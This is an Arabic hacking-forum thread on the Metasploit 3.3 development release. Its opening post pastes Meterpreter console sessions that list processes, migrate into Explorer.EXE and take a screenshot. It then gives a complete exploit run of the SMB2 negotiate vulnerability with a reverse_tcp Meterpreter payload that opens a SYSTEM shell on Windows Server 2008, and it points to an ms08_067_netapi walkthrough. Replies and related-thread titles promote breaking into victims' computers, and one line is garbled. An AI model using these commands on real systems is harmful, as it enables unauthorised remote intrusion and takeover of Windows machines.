![]() | رقم المشاركة : 1 (permalink) | ||
![]()
meterpreter > ps Process list ============ PID **** Path --- ---- ---- 204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe [ snipped ] 1736 Explorer.EXE C:\WINDOWS\Explorer.EXE 3348 sol.exe C:\WINDOWS\system32\sol.exe meterpreter > migrate 1736[*] Migrating to 1736...[*] Migration completed successfully. meterpreter > screenshot /tmp/boom.bmp[*] Image saved to /tmp/boom.bmp Opening browser to image. أما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7. عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع ****sploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!! msf> use exploit/windows/smb/smb2_negotiate_func_index msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp msf (exploit/smb2) > set LHOST 192.168.0.136 msf (exploit/smb2) > set LPORT 5678 msf (exploit/smb2) > set RHOST 192.168.0.211 msf (exploit/smb2) > exploit[*] Started reverse handler[*] Connecting to the target (192.168.0.211:445)...[*] Sending the exploit packet (854 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Sending stage (719360 bytes)[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158) meterpreter > sysinfo Computer: WIN-UAKGQGDWLX2 OS : Windows 2008 (Build 6001, Service Pack 1). Arch : x86 ********: en_US meterpreter > getuid Server user****: NT AUTHORITY\SYSTEM يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي: auxiliary/scanner/smb/smb2 طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر. الكاتب عبدالمهيمن ************************************************** *********************** بعد تحميل dev-3.3 لتشغيلها نذهب إلي مجلد البرنامج C:\msf3\msf***.bat بعد الإقتباس نرجع للتطبيق علي جهاز وهمي سنقوم بإختيار الثغرة الشهيرة ms08_067_netapi والشرح بالصور ![]() ![]() ![]() ![]() ![]() Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC j',dvhj ,ld.hj []d]m td ldjh sfg,dj 3>3-dev
| |||
| ![]() |
![]() | رقم المشاركة : 2 (permalink) | ||
![]() مشكور على مووضعك المتميز
| |||
| ![]() |
![]() | رقم المشاركة : 4 (permalink) | ||
![]() رابط الفيديو إضغط علي إسمي punisher77
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|
![]() | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
3 دروس ميتا سبلويت للمبتدئين جدا بالعربية | cisco_security | MetaSploit | 132 | 01-21-2013 05:59 PM |
شرحـ آخترآق بآلميتآ سبلويت و بدون آ شرحـ آخترآق بآلميتآ سبلويت و برسآل آي شيء للضحيه { بآلفيديو }~ | ابو بدر | MetaSploit | 22 | 09-10-2011 09:54 PM |
ثغرة ميتا جديدة لإختراق ويندوز فيستا + شرح استغلالها , تحميل الميتا الجديد ! 500 ثغرة :] | Hαcĸer'ѕ Kιɴɢ | قســم إختــراق الأجهــزة | 4 | 11-27-2010 04:01 AM |
صدور ميتا سبلويت 3.4.1 | D-GhosT s3cur!Ty-Z | جـــ'ابات العناكــ'ب | 7 | 07-30-2010 08:08 PM |